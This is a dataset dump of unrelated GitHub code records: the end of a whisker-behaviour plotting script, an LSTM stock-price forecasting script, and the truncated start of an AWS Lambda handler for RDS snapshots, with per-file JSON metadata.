ax.set_xticks([])\n ax.set_yticks([]) \n\n # Scale bar\n # 2.7mm = 60px, so 45um per px, or 222.2px per 10mm\n ax.plot([-200, -200+111.1], [275, 275], 'k-', lw=.8)\n ax.text(-200 + 55.55, 275, '5 mm', ha='center', va='bottom', size=12)\n \n # Save\n f.savefig('PLOT_EDGE_SUMMARY_ONLY.svg')\n 
f.savefig('PLOT_EDGE_SUMMARY_ONLY.png', dpi=300)\n\n\nif PLOT_OCCUPANCY_DISCONLY:\n ## Parameters\n # Metric to plot\n metric_topl = 'norm_whisks_per_trial'\n\n # Iterate over whisk type (rows of figure)\n whisk_typ_l = ['yes', 'non']\n \n # Do only discrimination\n task = 'discrimination'\n \n # Binning\n mouse_thresh = 4\n nwpt_thresh = .02\n \n # Plotting\n edge_alpha = .3\n occupancy_vmin = 0\n occupancy_vmax = .03\n \n \n ## Aggregrate\n # Slice by task and group by whisk type\n figure_gobj = aggregated_evidence_spatial.xs(\n task, level='task').groupby(\n 'contact_typ')\n\n \n ## Make handles\n f, axa = plt.subplots(\n len(whisk_typ_l), 1,\n figsize=(3, 6.5), sharex=True, sharey=True)\n \n f.subplots_adjust(left=0, right=1, bottom=0, top=.925, hspace=.3)\n \n \n ## Iterate over whisk types (rows)\n for whisk_typ, sub_ae in figure_gobj:\n \n ## Slice\n # Droplevel\n sub_ae = sub_ae.droplevel('contact_typ')\n\n # Slice data (evidence)\n axis_data = sub_ae[metric_topl]\n\n # Get ax\n ax = axa[\n whisk_typ_l.index(whisk_typ)\n ]\n\n # Set title\n if whisk_typ == 'yes':\n ax.set_title('whisks with contact\\n(location)')\n \n elif whisk_typ == 'non':\n ax.set_title('whisks without contact\\n(location)')\n \n\n ## Spatialize occupancy\n # Mean over mice, separately by whisker\n spatialized = axis_data.mean(\n level=['whisker', 'bin_x', 'bin_y'])\n \n\n # Combine to rgb\n occupancy_rgb = extras.combine_whisker_occupancy_to_rgb(\n spatialized, full_spatial_bincenter_midx, \n bins_x, bins_y,\n x_index=all_ces.columns, y_index=all_ces.index,\n vmin=occupancy_vmin, vmax=occupancy_vmax)\n \n\n ## Calculate edge_data\n edge_data = all_ces.values\n\n # Mask the edge_data, so that it has no effect where it is null\n # Actually, this just avoids warnings about null in normalizing\n masked_edge_data = np.ma.masked_array(\n edge_data, np.isnan(edge_data))\n\n # Normalize edge data to (0, 1) and colormap in black and white\n # This replaces masked data with the colormap's \"bad value\"\n edge_norm = matplotlib.colors.Normalize(vmin=0, vmax=1)\n edge_data_rgba = plt.cm.gray_r(edge_norm(masked_edge_data))\n\n \n ## Blend occupancy_data and edge_data\n blended_rgba = my.plot.alpha_blend_with_mask(\n edge_data_rgba, \n occupancy_rgb, \n edge_alpha,\n masked_edge_data.mask,\n )\n\n \n ## Plot\n im = my.plot.imshow(\n blended_rgba, ax=ax, \n x=all_ces.columns.values, y=all_ces.index.values)\n \n\n ## Pretty\n # Plot follicle and ellipses\n extras.plot_follicle_and_ellipses(\n ax, transformed_mean_follicle, label_ellipses=True)\n \n # Limits\n extras.consistent_limits(ax)\n\n\n f.savefig('PLOT_OCCUPANCY_DISCONLY.svg')\n f.savefig('PLOT_OCCUPANCY_DISCONLY.png', dpi=300) \n\n\nif PLOT_EVIDENCE_DISCONLY_REWSIDEONLY:\n ## Parameters\n # Metric to plot\n metric_topl = 'rewside_evidence'\n\n # Iterate over whisk type (rows of figure)\n whisk_typ_l = ['yes', 'non']\n \n # Do only discrimination\n task = 'discrimination'\n \n # Binning\n mouse_thresh = 4\n nwpt_thresh = .02\n \n # Plotting\n edge_alpha = .3\n evidence_vmin = -1\n evidence_vmax = 1\n \n \n ## Aggregrate\n # Slice by task and group by whisk type\n figure_gobj = aggregated_evidence_spatial.xs(\n task, level='task').groupby(\n 'contact_typ')\n \n \n ## Make handles\n f, axa = plt.subplots(\n len(whisk_typ_l), 1,\n figsize=(4.25, 6.5), sharex=True, sharey=True)\n \n f.subplots_adjust(left=0, right=.7, bottom=0, top=.925, hspace=.3)\n\n # Axis for colorbar\n cb_ax = f.add_axes((.77, .27, .03, .4))\n cb = f.colorbar(\n matplotlib.cm.ScalarMappable(\n 
matplotlib.colors.Normalize(vmin=evidence_vmin, vmax=evidence_vmax),\n cmap=plt.cm.RdBu_r), cax=cb_ax)\n cb.set_ticks((evidence_vmin, 0, evidence_vmax))\n cb.ax.tick_params(labelsize=12)\n \n \n ## Iterate over whisk types (rows)\n for whisk_typ, sub_ae in figure_gobj:\n \n ## Slice\n # Droplevel\n sub_ae = sub_ae.droplevel('contact_typ')\n\n # Slice data (evidence)\n axis_data = sub_ae[metric_topl]\n\n # Get ax\n ax = axa[\n whisk_typ_l.index(whisk_typ)\n ]\n\n # Set title\n if whisk_typ == 'yes':\n ax.set_title('whisks with contact\\n(evidence)')\n \n elif whisk_typ == 'non':\n ax.set_title('whisks without contact\\n(evidence)')\n \n\n ## Identify spatial bins with enough whisks to be worth plotting\n keep_mask = extras.threshold_bins_by_n_whisks(\n sub_ae, mouse_thresh=mouse_thresh, nwpt_thresh=nwpt_thresh)\n \n \n ## Spatialize evidence\n evidence_data = extras.spatialize_evidence(\n axis_data, keep_mask, full_spatial_bincenter_midx,\n bins_x, bins_y,\n x_index=all_ces.columns, y_index=all_ces.index,\n )\n\n # Use only raw data\n evidence_data = evidence_data.values\n\n\n ## Calculate edge_data\n edge_data = all_ces.values\n\n # Mask the edge_data, so that it has no effect where it is null\n # Actually, this just avoids warnings about null in normalizing\n masked_edge_data = np.ma.masked_array(\n edge_data, np.isnan(edge_data))\n\n\n ## Normalize and blend plot\n extras.normalize_and_blend_plot(\n masked_edge_data, evidence_data, edge_alpha=edge_alpha, ax=ax,\n evidence_vmin=evidence_vmin, evidence_vmax=evidence_vmax,\n x_index=all_ces.columns.values, y_index=all_ces.index.values,\n )\n\n\n ## Pretty\n # Plot follicle and ellipses\n extras.plot_follicle_and_ellipses(ax, transformed_mean_follicle)\n \n # Limits\n extras.consistent_limits(ax)\n\n \n ## Save\n f.savefig('PLOT_EVIDENCE_DISCONLY_REWSIDEONLY.svg')\n f.savefig('PLOT_EVIDENCE_DISCONLY_REWSIDEONLY.png', dpi=300) \n\n\nif PLOT_EVIDENCE_DISCONLY_CHOICEONLY:\n ## Parameters\n # Metric to plot\n metric_topl = 'choice_evidence'\n\n # Iterate over whisk type (rows of figure)\n whisk_typ_l = ['yes', 'non']\n \n # Do only discrimination\n task = 'discrimination'\n \n # Binning\n mouse_thresh = 4\n nwpt_thresh = .02\n \n # Plotting\n edge_alpha = .3\n evidence_vmin = -.5\n evidence_vmax = .5\n \n \n ## Aggregrate\n # Slice by task and group by whisk type\n figure_gobj = aggregated_evidence_spatial.xs(\n task, level='task').groupby(\n 'contact_typ')\n \n \n ## Make handles\n f, axa = plt.subplots(\n len(whisk_typ_l), 1,\n figsize=(4.25, 6.5), sharex=True, sharey=True)\n \n f.subplots_adjust(left=0, right=.7, bottom=0, top=.925, hspace=.3)\n \n # Axis for colorbar\n cb_ax = f.add_axes((.77, .27, .03, .4))\n cb = f.colorbar(\n matplotlib.cm.ScalarMappable(\n matplotlib.colors.Normalize(vmin=evidence_vmin, vmax=evidence_vmax),\n cmap=plt.cm.RdBu_r), cax=cb_ax)\n cb.set_ticks((evidence_vmin, 0, evidence_vmax))\n cb.ax.tick_params(labelsize=12)\n \n \n ## Iterate over whisk types (rows)\n for whisk_typ, sub_ae in figure_gobj:\n \n ## Slice\n # Droplevel\n sub_ae = sub_ae.droplevel('contact_typ')\n\n # Slice data (evidence)\n axis_data = sub_ae[metric_topl]\n\n # Get ax\n ax = axa[\n whisk_typ_l.index(whisk_typ)\n ]\n \n # Set title\n if whisk_typ == 'yes':\n ax.set_title('whisks with contact\\n(evidence)')\n \n elif whisk_typ == 'non':\n ax.set_title('whisks without contact\\n(evidence)')\n\n\n ## Identify spatial bins with enough whisks to be worth plotting\n keep_mask = extras.threshold_bins_by_n_whisks(\n sub_ae, mouse_thresh=mouse_thresh, 
nwpt_thresh=nwpt_thresh)\n \n \n ## Spatialize evidence\n evidence_data = extras.spatialize_evidence(\n axis_data, keep_mask, full_spatial_bincenter_midx,\n bins_x, bins_y,\n x_index=all_ces.columns, y_index=all_ces.index,\n )\n\n # Use only raw data\n evidence_data = evidence_data.values\n\n\n ## Calculate edge_data\n edge_data = all_ces.values\n\n # Mask the edge_data, so that it has no effect where it is null\n # Actually, this just avoids warnings about null in normalizing\n masked_edge_data = np.ma.masked_array(\n edge_data, np.isnan(edge_data))\n\n\n ## Normalize and blend plot\n extras.normalize_and_blend_plot(\n masked_edge_data, evidence_data, edge_alpha=edge_alpha, ax=ax,\n evidence_vmin=evidence_vmin, evidence_vmax=evidence_vmax,\n x_index=all_ces.columns.values, y_index=all_ces.index.values,\n )\n\n\n ## Pretty\n # Plot follicle and ellipses\n extras.plot_follicle_and_ellipses(ax, transformed_mean_follicle)\n \n # Limits\n extras.consistent_limits(ax)\n\n \n \n \n ## Save\n f.savefig('PLOT_EVIDENCE_DISCONLY_CHOICEONLY.svg')\n f.savefig('PLOT_EVIDENCE_DISCONLY_CHOICEONLY.png', dpi=300) \n\n \nplt.show()", "repo_name": "cxrodgers/Rodgers2021", "sub_path": "04_logreg_vis/main3b.py", "file_name": "main3b.py", "file_ext": "py", "file_size_in_byte": 23786, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "my.plot.plot.manuscript_defaults", "line_number": 37, "usage_type": "call"}, {"api_name": "my.plot.plot", "line_number": 37, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 37, "usage_type": "name"}, {"api_name": "my.plot.plot.font_embed", "line_number": 38, "usage_type": "call"}, {"api_name": "my.plot.plot", "line_number": 38, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 38, "usage_type": "name"}, {"api_name": "json.load", "line_number": 43, "usage_type": "call"}, {"api_name": "my.plot.dataload.load_session_metadata", "line_number": 47, "usage_type": "call"}, {"api_name": "my.plot.dataload", "line_number": 47, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 47, "usage_type": "name"}, {"api_name": "pandas.read_pickle", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path", "line_number": 48, "usage_type": "attribute"}, {"api_name": "my.plot.misc.insert_mouse_and_task_levels", "line_number": 51, "usage_type": "call"}, {"api_name": "my.plot.misc", "line_number": 51, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 51, "usage_type": "name"}, {"api_name": "pandas.read_pickle", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 64, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 65, "usage_type": "call"}, {"api_name": "os.path", "line_number": 65, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 73, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 74, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 75, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", 
"line_number": 81, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path", "line_number": 82, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "my.plot.misc.transform", "line_number": 89, "usage_type": "call"}, {"api_name": "my.plot.misc", "line_number": 89, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 89, "usage_type": "name"}, {"api_name": "pandas.read_pickle", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "my.plot.misc.insert_mouse_and_task_levels", "line_number": 99, "usage_type": "call"}, {"api_name": "my.plot.misc", "line_number": 99, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 99, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 103, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 112, "usage_type": "attribute"}, {"api_name": "pandas.MultiIndex.from_frame", "line_number": 113, "usage_type": "call"}, {"api_name": "pandas.MultiIndex", "line_number": 113, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 127, "usage_type": "call"}, {"api_name": "pandas.read_pickle", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 136, "usage_type": "call"}, {"api_name": "os.path", "line_number": 136, "usage_type": "attribute"}, {"api_name": "pandas.read_pickle", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "numpy.isinf", "line_number": 192, "usage_type": "call"}, {"api_name": "my.plot.misc.transform", "line_number": 206, "usage_type": "call"}, {"api_name": "my.plot.misc", "line_number": 206, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 206, "usage_type": "name"}, {"api_name": "pandas.concat", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 252, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 254, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 258, "usage_type": "call"}, {"api_name": "pandas.cut", "line_number": 262, "usage_type": "call"}, {"api_name": "numpy.int", "line_number": 270, "usage_type": "attribute"}, {"api_name": "numpy.int", "line_number": 271, "usage_type": "attribute"}, {"api_name": "pandas.MultiIndex.from_product", "line_number": 274, "usage_type": "call"}, {"api_name": "pandas.MultiIndex", "line_number": 274, "usage_type": "attribute"}, {"api_name": "pandas.Index", "line_number": 275, "usage_type": "call"}, {"api_name": "pandas.Index", "line_number": 276, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 306, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 366, "usage_type": "call"}, {"api_name": "pandas.MultiIndex.from_frame", "line_number": 367, "usage_type": "call"}, {"api_name": "pandas.MultiIndex", "line_number": 367, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 384, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 
"line_number": 384, "usage_type": "name"}, {"api_name": "extras.plot_warped_edge_summary", "line_number": 388, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 443, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 443, "usage_type": "name"}, {"api_name": "extras.combine_whisker_occupancy_to_rgb", "line_number": 480, "usage_type": "call"}, {"api_name": "numpy.ma.masked_array", "line_number": 492, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 492, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 493, "usage_type": "call"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 497, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 497, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.cm.gray_r", "line_number": 498, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 498, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 498, "usage_type": "name"}, {"api_name": "my.plot.plot.alpha_blend_with_mask", "line_number": 502, "usage_type": "call"}, {"api_name": "my.plot.plot", "line_number": 502, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 502, "usage_type": "name"}, {"api_name": "my.plot.plot.imshow", "line_number": 511, "usage_type": "call"}, {"api_name": "my.plot.plot", "line_number": 511, "usage_type": "attribute"}, {"api_name": "my.plot", "line_number": 511, "usage_type": "name"}, {"api_name": "extras.plot_follicle_and_ellipses", "line_number": 518, "usage_type": "call"}, {"api_name": "extras.consistent_limits", "line_number": 522, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 558, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 558, "usage_type": "name"}, {"api_name": "matplotlib.cm.ScalarMappable", "line_number": 567, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 567, "usage_type": "attribute"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 568, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 568, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.cm", "line_number": 569, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 569, "usage_type": "name"}, {"api_name": "extras.threshold_bins_by_n_whisks", "line_number": 598, "usage_type": "call"}, {"api_name": "extras.spatialize_evidence", "line_number": 603, "usage_type": "call"}, {"api_name": "numpy.ma.masked_array", "line_number": 618, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 618, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 619, "usage_type": "call"}, {"api_name": "extras.normalize_and_blend_plot", "line_number": 623, "usage_type": "call"}, {"api_name": "extras.plot_follicle_and_ellipses", "line_number": 632, "usage_type": "call"}, {"api_name": "extras.consistent_limits", "line_number": 635, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 672, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 672, "usage_type": "name"}, {"api_name": "matplotlib.cm.ScalarMappable", "line_number": 681, "usage_type": "call"}, {"api_name": "matplotlib.cm", "line_number": 681, "usage_type": "attribute"}, {"api_name": "matplotlib.colors.Normalize", "line_number": 682, "usage_type": "call"}, {"api_name": "matplotlib.colors", "line_number": 682, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.cm", 
"line_number": 683, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 683, "usage_type": "name"}, {"api_name": "extras.threshold_bins_by_n_whisks", "line_number": 712, "usage_type": "call"}, {"api_name": "extras.spatialize_evidence", "line_number": 717, "usage_type": "call"}, {"api_name": "numpy.ma.masked_array", "line_number": 732, "usage_type": "call"}, {"api_name": "numpy.ma", "line_number": 732, "usage_type": "attribute"}, {"api_name": "numpy.isnan", "line_number": 733, "usage_type": "call"}, {"api_name": "extras.normalize_and_blend_plot", "line_number": 737, "usage_type": "call"}, {"api_name": "extras.plot_follicle_and_ellipses", "line_number": 746, "usage_type": "call"}, {"api_name": "extras.consistent_limits", "line_number": 749, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 759, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 759, "usage_type": "name"}]}
+{"seq_id": "24882022462", "text": "import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport DataPreProcessor\nimport sys\nimport os\nimport csv\nimport tensorflow\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.metrics import mean_squared_error\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Dense, Activation\nfrom tensorflow.keras.layers import LSTM\n\npath = \"Data\"\ndirectory = os.fsencode(path)\ndirs = os.listdir(path)\n\nMatcher=pd.read_csv(\"Symbol_Piotroski1.csv\")\n\nTicker=list(Matcher['SYMBOL'])\n\nresult = []\n\nfor file in dirs:\n if file.split('.')[0] in Ticker:\n\n np.random.seed(7)\n\n current_file = \"Data/\" + str(file)\n dataset = pd.read_csv(current_file, usecols=[1,2,3,4])\n dataset = dataset.reindex(index = dataset.index[::-1])\n\n obsolete = np.arange(1, len(dataset) +1, 1)\n\n OHLC_avg = dataset.mean(axis=1)\n OHLC_avg_copy = dataset.mean(axis=1)\n HLC_avg = dataset[['High', 'Low', 'Close']].mean(axis=1)\n close_val = dataset[['Close']]\n\n plt.plot(obsolete, OHLC_avg, 'r', label='OHLC_avg')\n plt.plot(obsolete, HLC_avg, 'b', label='HLC_avg')\n plt.plot(obsolete, close_val, 'g', label='Closing Price')\n plt.legend(loc = 'upper right')\n plt.show()\n\n OHLC_avg = np.reshape(OHLC_avg.values, (len(OHLC_avg),1))\n scaler = MinMaxScaler(feature_range=(0,1))\n OHLC_avg = scaler.fit_transform(OHLC_avg)\n\n train_OHLC = int(len(OHLC_avg) * .75)\n test_OHLC = len(OHLC_avg) - train_OHLC\n train_OHLC, test_OHLC = OHLC_avg[0:train_OHLC,:], OHLC_avg[train_OHLC:len(OHLC_avg),:]\n\n trainX, trainY = DataPreProcessor.new_dataset(train_OHLC,5)\n testX, testY = DataPreProcessor.new_dataset(test_OHLC, 5)\n\n trainX = np.reshape(trainX, (trainX.shape[0], 1,trainX.shape[1]))\n testX = np.reshape(testX, (testX.shape[0], 1, testX.shape[1]))\n step_size = 5\n\n model = Sequential()\n model.add(LSTM(32, input_shape=(1, step_size), return_sequences=True))\n model.add(LSTM(16))\n model.add(Dense(1))\n model.add(Activation('linear'))\n\n model.compile(loss='mean_squared_error', optimizer='adagrad')\n model.fit(trainX,trainY,epochs=50, batch_size=15, verbose=2)\n\n trainPredict = model.predict(trainX)\n testPredict = model.predict(testX)\n\n # DE-NORMALIZING FOR PLOTTING\n\n trainPredict = scaler.inverse_transform(trainPredict)\n trainY = scaler.inverse_transform([trainY])\n testPredict = scaler.inverse_transform(testPredict)\n testY = scaler.inverse_transform([testY])\n\n # TRAINING RMSE\n trainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:, 0]))\n print('Train RMSE: %.2f' % (trainScore))\n\n # TEST RMSE\n testScore = math.sqrt(mean_squared_error(testY[0], testPredict[:, 0]))\n print('Test RMSE: %.2f' % (testScore))\n\n # CREATING SIMILAR DATASET TO PLOT TRAINING PREDICTIONS\n trainPredictPlot = np.empty_like(OHLC_avg)\n trainPredictPlot[:, :] = np.nan\n trainPredictPlot[step_size:len(trainPredict) + step_size, :] = trainPredict\n\n # CREATING SIMILAR DATASSET TO PLOT TEST PREDICTIONS\n testPredictPlot = np.empty_like(OHLC_avg)\n testPredictPlot[:, :] = np.nan\n testPredictPlot[len(trainPredict) + (step_size * 2) + 1:len(OHLC_avg) - 1, :] = testPredict\n\n # DE-NORMALIZING MAIN DATASET\n OHLC_avg = scaler.inverse_transform(OHLC_avg)\n\n # PLOT OF MAIN OHLC VALUES, TRAIN PREDICTIONS AND TEST PREDICTIONS\n plt.plot(OHLC_avg, 'g', label='original dataset')\n plt.plot(trainPredictPlot, 'r', label='training set')\n plt.plot(testPredictPlot, 'b', label='predicted stock price/test set')\n 
plt.legend(loc='upper right')\n plt.xlabel('Time in Days')\n plt.ylabel('OHLC Value of Apple Stocks')\n plt.show()\n\n # PREDICT FUTURE VALUES\n last_val = OHLC_avg[np.array([-1, -2, -3, -4, -5])]\n last_val = scaler.fit_transform(last_val)\n # last_val_scaled = last_val/last_val\n # next_val = model.predict(np.reshape(last_val, (1,1,step_size)))\n # print (\"Last Day Value:\", np.asscalar(last_val))\n # print (\"Next Day Value:\", np.asscalar(last_val*next_val))\n\n pred_vals = []\n pred_vals1 = []\n pred_vals1.append(file)\n for i in range(0, 5):\n # last_val_scaled = last_val/last_val\n print(last_val)\n next_val = model.predict(np.reshape(last_val, (1, 1, step_size)))\n pred_vals.append(next_val)\n print(next_val)\n last_val = np.append(last_val, next_val)\n last_val = np.delete(last_val, 0)\n\n # next_vals.append(np.asscalar(model.predict(np.reshape(, (1,1,step_size)))))\n # last_val1.append(next_vals[i-1]*last_val1[i])\n # pred_vals=scaler.inverse_transform(np.array(pred_vals).reshape(1,5))\n\n ### Scaling Values back using last 5 values as scale standard\n pred_vals = np.array(pred_vals).reshape(1, 5)\n last_val_unscaled = np.array(OHLC_avg_copy[np.array([0, 1, 2, 3, 4])]).reshape(1, 5)\n\n scaler = MinMaxScaler(feature_range=(0, 1))\n last_val_scaler = scaler.fit_transform(last_val_unscaled)\n\n pred_vals_rescaled = scaler.inverse_transform(pred_vals)\n\n a = list(pred_vals_rescaled)[0]\n pred_vals1.append(a)\n\n result.append(pred_vals1)\n\n res = pd.DataFrame(result)\n res.to_csv('results.csv', index=False, header=False)\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "Nandish0409/MiniProject", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 5613, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.fsencode", "line_number": 17, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 29, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 43, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 43, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 44, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 44, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 45, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 46, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 46, "usage_type": "name"}, {"api_name": "numpy.reshape", "line_number": 48, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 49, "usage_type": "call"}, {"api_name": "DataPreProcessor.new_dataset", "line_number": 56, "usage_type": "call"}, {"api_name": "DataPreProcessor.new_dataset", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 59, "usage_type": "call"}, {"api_name": 
"numpy.reshape", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.keras.models.Sequential", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 64, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.LSTM", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Dense", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.keras.layers.Activation", "line_number": 67, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 83, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 83, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 87, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.empty_like", "line_number": 91, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 92, "usage_type": "attribute"}, {"api_name": "numpy.empty_like", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 97, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 104, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 104, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 108, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 108, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 113, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 129, "usage_type": "call"}, {"api_name": "numpy.delete", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 138, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 140, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 150, "usage_type": "call"}]}
+{"seq_id": "22353516718", "text": "import os\nimport json\nimport re\n\nimport boto3\nfrom botocore.exceptions import ClientError\n\nSTS_CLIENT = boto3.client(\"sts\")\nCUSTOM_KMS_KEY = os.environ['custom_kms_key']\nASSUME_ROLE_ARN = os.environ['assume_role_arn']\n\ndef lambda_handler(event, context):\n \"\"\"Lambda handler for the zeroth lambda of the Maskopy process.\n Args:\n event (dict): AWS Lambda uses this parameter to pass in event data to the handler.\n context (Context): AWS Lambda provides runtime info and meta data.\n Returns:\n :obj:`dict` of str:str: Return dict with details of snapshot that was created.\n Raises:\n MaskopyResourceNotFoundException: Raised if inputs are not valid.\n Exception: Generic exception raised\n if final snapshot name already exists in destination.\n \"\"\"\n\n rds_client_local = boto3.client(\"rds\")\n assume_role_session = create_account_session(\n STS_CLIENT,\n ASSUME_ROLE_ARN,\n context.aws_request_id)\n 